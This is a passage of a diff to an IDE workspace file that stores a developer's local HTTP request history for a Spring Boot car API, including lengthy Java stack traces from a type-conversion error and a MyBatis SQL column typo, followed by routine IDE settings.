\\u0026#39;org.springframework.data.domain.Sort\\u0026#39;: no matching editors or conversion strategy found]\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.constructAttribute(ModelAttributeMethodProcessor.java:329)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.createAttribute(ModelAttributeMethodProcessor.java:220)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletModelAttributeMethodProcessor.createAttribute(ServletModelAttributeMethodProcessor.java:85)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.resolveArgument(ModelAttributeMethodProcessor.java:147)\\r\\n\\tat org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:179)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:146)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808)\\r\\n\\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1071)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:964)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:670)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:779)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197)\\r\\n\\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)\\r\\n\\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)\\r\\n\\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135)\\r\\n\\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)\\r\\n\\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)\\r\\n\\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:360)\\r\\n\\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:399)\\r\\n\\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)\\r\\n\\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893)\\r\\n\\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1789)\\r\\n\\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)\\r\\n\\tat org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\\r\\n\\tat java.lang.Thread.run(Thread.java:748)\\r\\n\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":16.0,\"minute\":33.0,\"second\":10.0,\"nano\":9.304808E8}}},{\"url\":\"http://localhost:8080/car\",\"header\":[{\"is_checked\":1,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1,\"key\":\"id\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Integer\",\"value\":\"1\"},{\"is_checked\":0,\"key\":\"carId\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":0,\"key\":\"sort.orders\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Array\",\"value\":\"\"},{\"is_checked\":0,\"key\":\"sort.orders.direction\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.Direction\",\"value\":\"ASC\"},{\"is_checked\":0,\"key\":\"sort.orders.property\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":0,\"key\":\"sort.orders.ignoreCase\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"boolean\",\"value\":\"false\"},{\"is_checked\":0,\"key\":\"sort.orders.nullHandling\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.NullHandling\",\"value\":\"NATIVE\"},{\"is_checked\":1,\"key\":\"page\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1,\"key\":\"size\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1,\"key\":\"sort\",\"type\":\"Text\",\"value\":\"desc\"},{\"is_checked\":1,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8080/car?size\\u003d1\\u0026id\\u003d1\\u0026page\\u003d1\\u0026sort\\u003ddesc\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eMon Jun 24 16:33:16 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dBad Request, status\\u003d400).\\u003c/div\\u003e\\u003cdiv\\u003eValidation failed for object\\u003d\\u0026#39;pageRequest\\u0026#39;. Error count: 1\\u003c/div\\u003e\\u003cdiv style\\u003d\\u0027white-space:pre-wrap;\\u0027\\u003eorg.springframework.validation.BindException: org.springframework.validation.BeanPropertyBindingResult: 1 errors\\nField error in object \\u0026#39;pageRequest\\u0026#39; on field \\u0026#39;sort\\u0026#39;: rejected value [desc]; codes [typeMismatch.pageRequest.sort,typeMismatch.sort,typeMismatch.org.springframework.data.domain.Sort,typeMismatch]; arguments [org.springframework.context.support.DefaultMessageSourceResolvable: codes [pageRequest.sort,sort]; arguments []; default message [sort]]; default message [Failed to convert value of type \\u0026#39;java.lang.String\\u0026#39; to required type \\u0026#39;org.springframework.data.domain.Sort\\u0026#39;; nested exception is java.lang.IllegalStateException: Cannot convert value of type \\u0026#39;java.lang.String\\u0026#39; to required type \\u0026#39;org.springframework.data.domain.Sort\\u0026#39;: no matching editors or conversion strategy found]\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.constructAttribute(ModelAttributeMethodProcessor.java:329)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.createAttribute(ModelAttributeMethodProcessor.java:220)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletModelAttributeMethodProcessor.createAttribute(ServletModelAttributeMethodProcessor.java:85)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.resolveArgument(ModelAttributeMethodProcessor.java:147)\\r\\n\\tat org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:179)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:146)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808)\\r\\n\\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1071)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:964)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:670)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:779)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197)\\r\\n\\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)\\r\\n\\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)\\r\\n\\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135)\\r\\n\\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)\\r\\n\\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)\\r\\n\\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:360)\\r\\n\\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:399)\\r\\n\\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)\\r\\n\\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893)\\r\\n\\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1789)\\r\\n\\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)\\r\\n\\tat org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\\r\\n\\tat java.lang.Thread.run(Thread.java:748)\\r\\n\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024,\"month\":6,\"day\":24},\"time\":{\"hour\":16,\"minute\":33,\"second\":16,\"nano\":708698800}}}],\"/car/{id}\":[{\"url\":\"http://localhost:8080/car/1\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"description\":\"主键\",\"is_checked\":1.0,\"key\":\"id\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Integer\",\"value\":\"1\"},{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8080/car/1\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eMon Jun 24 16:16:31 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dInternal Server Error, status\\u003d500).\\u003c/div\\u003e\\u003cdiv\\u003e\\r\\n### Error querying database. Cause: com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: Unknown column \\u0026#39;idcar_id\\u0026#39; in \\u0026#39;field list\\u0026#39;\\r\\n### The error may exist in file [D:\\\\workspace\\\\etl-cloud\\\\etl-heihei\\\\target\\\\classes\\\\mapper\\\\CarDao.xml]\\r\\n### The error may involve defaultParameterMap\\r\\n### The error occurred while setting parameters\\r\\n### SQL: select idcar_id from car where id \\u003d ?\\r\\n### Cause: com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: Unknown column \\u0026#39;idcar_id\\u0026#39; in \\u0026#39;field list\\u0026#39;\\n; bad SQL grammar []; nested exception is com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: Unknown column \\u0026#39;idcar_id\\u0026#39; in \\u0026#39;field list\\u0026#39;\\u003c/div\\u003e\\u003cdiv style\\u003d\\u0027white-space:pre-wrap;\\u0027\\u003eorg.springframework.jdbc.BadSqlGrammarException: \\r\\n### Error querying database. Cause: com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: Unknown column \\u0026#39;idcar_id\\u0026#39; in \\u0026#39;field list\\u0026#39;\\r\\n### The error may exist in file [D:\\\\workspace\\\\etl-cloud\\\\etl-heihei\\\\target\\\\classes\\\\mapper\\\\CarDao.xml]\\r\\n### The error may involve defaultParameterMap\\r\\n### The error occurred while setting parameters\\r\\n### SQL: select idcar_id from car where id \\u003d ?\\r\\n### Cause: com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: Unknown column \\u0026#39;idcar_id\\u0026#39; in \\u0026#39;field list\\u0026#39;\\n; bad SQL grammar []; nested exception is com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: Unknown column \\u0026#39;idcar_id\\u0026#39; in \\u0026#39;field list\\u0026#39;\\r\\n\\tat org.springframework.jdbc.support.SQLErrorCodeSQLExceptionTranslator.doTranslate(SQLErrorCodeSQLExceptionTranslator.java:239)\\r\\n\\tat org.springframework.jdbc.support.AbstractFallbackSQLExceptionTranslator.translate(AbstractFallbackSQLExceptionTranslator.java:70)\\r\\n\\tat org.mybatis.spring.MyBatisExceptionTranslator.translateExceptionIfPossible(MyBatisExceptionTranslator.java:74)\\r\\n\\tat org.mybatis.spring.SqlSessionTemplate$SqlSessionInterceptor.invoke(SqlSessionTemplate.java:440)\\r\\n\\tat com.sun.proxy.$Proxy88.selectOne(Unknown Source)\\r\\n\\tat org.mybatis.spring.SqlSessionTemplate.selectOne(SqlSessionTemplate.java:159)\\r\\n\\tat org.apache.ibatis.binding.MapperMethod.execute(MapperMethod.java:87)\\r\\n\\tat org.apache.ibatis.binding.MapperProxy.invoke(MapperProxy.java:57)\\r\\n\\tat com.sun.proxy.$Proxy89.queryById(Unknown Source)\\r\\n\\tat com.service.impl.CarServiceImpl.queryById(CarServiceImpl.java:32)\\r\\n\\tat com.controller.CarController.queryById(CarController.java:47)\\r\\n\\tat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\\r\\n\\tat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\\r\\n\\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\\r\\n\\tat java.lang.reflect.Method.invoke(Method.java:498)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.doInvoke(InvocableHandlerMethod.java:205)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:150)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808)\\r\\n\\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1071)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:964)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:670)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:779)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197)\\r\\n\\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)\\r\\n\\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)\\r\\n\\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135)\\r\\n\\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)\\r\\n\\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)\\r\\n\\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:360)\\r\\n\\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:399)\\r\\n\\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)\\r\\n\\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893)\\r\\n\\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1789)\\r\\n\\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)\\r\\n\\tat org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\\r\\n\\tat java.lang.Thread.run(Thread.java:748)\\r\\nCaused by: com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: Unknown column \\u0026#39;idcar_id\\u0026#39; in \\u0026#39;field list\\u0026#39;\\r\\n\\tat sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)\\r\\n\\tat sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)\\r\\n\\tat sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)\\r\\n\\tat java.lang.reflect.Constructor.newInstance(Constructor.java:423)\\r\\n\\tat com.mysql.jdbc.Util.handleNewInstance(Util.java:425)\\r\\n\\tat com.mysql.jdbc.Util.getInstance(Util.java:408)\\r\\n\\tat com.mysql.jdbc.SQLError.createSQLException(SQLError.java:944)\\r\\n\\tat com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3978)\\r\\n\\tat com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3914)\\r\\n\\tat com.mysql.jdbc.MysqlIO.sendCommand(MysqlIO.java:2530)\\r\\n\\tat com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:2683)\\r\\n\\tat com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2495)\\r\\n\\tat com.mysql.jdbc.PreparedStatement.executeInternal(PreparedStatement.java:1903)\\r\\n\\tat com.mysql.jdbc.PreparedStatement.execute(PreparedStatement.java:1242)\\r\\n\\tat com.alibaba.druid.pool.DruidPooledPreparedStatement.execute(DruidPooledPreparedStatement.java:497)\\r\\n\\tat org.apache.ibatis.executor.statement.PreparedStatementHandler.query(PreparedStatementHandler.java:64)\\r\\n\\tat org.apache.ibatis.executor.statement.RoutingStatementHandler.query(RoutingStatementHandler.java:79)\\r\\n\\tat org.apache.ibatis.executor.SimpleExecutor.doQuery(SimpleExecutor.java:63)\\r\\n\\tat org.apache.ibatis.executor.BaseExecutor.queryFromDatabase(BaseExecutor.java:324)\\r\\n\\tat org.apache.ibatis.executor.BaseExecutor.query(BaseExecutor.java:156)\\r\\n\\tat org.apache.ibatis.executor.CachingExecutor.query(CachingExecutor.java:109)\\r\\n\\tat org.apache.ibatis.executor.CachingExecutor.query(CachingExecutor.java:83)\\r\\n\\tat org.apache.ibatis.session.defaults.DefaultSqlSession.selectList(DefaultSqlSession.java:147)\\r\\n\\tat org.apache.ibatis.session.defaults.DefaultSqlSession.selectList(DefaultSqlSession.java:140)\\r\\n\\tat org.apache.ibatis.session.defaults.DefaultSqlSession.selectOne(DefaultSqlSession.java:76)\\r\\n\\tat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\\r\\n\\tat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\\r\\n\\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\\r\\n\\tat java.lang.reflect.Method.invoke(Method.java:498)\\r\\n\\tat org.mybatis.spring.SqlSessionTemplate$SqlSessionInterceptor.invoke(SqlSessionTemplate.java:426)\\r\\n\\t... 57 more\\r\\n\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":16.0,\"minute\":16.0,\"second\":31.0,\"nano\":4.456232E8}}},{\"url\":\"http://localhost:8080/car/1\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"description\":\"主键\",\"is_checked\":1.0,\"key\":\"id\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Integer\",\"value\":\"1\"},{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"{\\n \\\"id\\\": 1,\\n \\\"carId\\\": null\\n}\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":16.0,\"minute\":18.0,\"second\":42.0,\"nano\":6.308908E8}}}]}",
+ "RequestMappingsPanelOrder0": "0",
+ "RequestMappingsPanelOrder1": "1",
+ "RequestMappingsPanelWidth0": "75",
+ "RequestMappingsPanelWidth1": "75",
+ "RunOnceActivity.OpenProjectViewOnStart": "true",
+ "RunOnceActivity.ShowReadmeOnStart": "true",
+ "SHARE_PROJECT_CONFIGURATION_FILES": "true",
+ "WebServerToolWindowFactoryState": "false",
+ "git-widget-placeholder": "main",
+ "jdk.selected.JAVA_MODULE": "1.8",
+ "last_opened_file_path": "D:/workspace/etl-cloud/etl-heihei/src/main/resources",
+ "node.js.detected.package.eslint": "true",
+ "node.js.detected.package.tslint": "true",
+ "node.js.selected.package.eslint": "(autodetect)",
+ "node.js.selected.package.tslint": "(autodetect)",
+ "nodejs_package_manager_path": "npm",
+ "project.structure.last.edited": "项目",
+ "project.structure.proportion": "0.17",
+ "project.structure.side.proportion": "0.29885057",
+ "settings.editor.selected.configurable": "MavenSettings",
+ "spring.configuration.checksum": "692d8fdaf921c59cf11c2193ba555b94",
+ "vue.rearranger.settings.migration": "true"
},
- "keyToStringList": {
- "DatabaseDriversLRU": [
- "mysql"
+ "keyToStringList": {
+ "DatabaseDriversLRU": [
+ "mysql"
]
}
-}]]>
+}
@@ -159,11 +242,11 @@
+
-
@@ -184,7 +267,7 @@
-
+
@@ -259,10 +342,10 @@
+
-
@@ -298,7 +381,12 @@
-
+
+
+
+
+
+
@@ -356,7 +444,15 @@
1719405795611
-
+
+
+ 1719744166156
+
+
+
+ 1719744166156
+
+
@@ -380,7 +476,8 @@
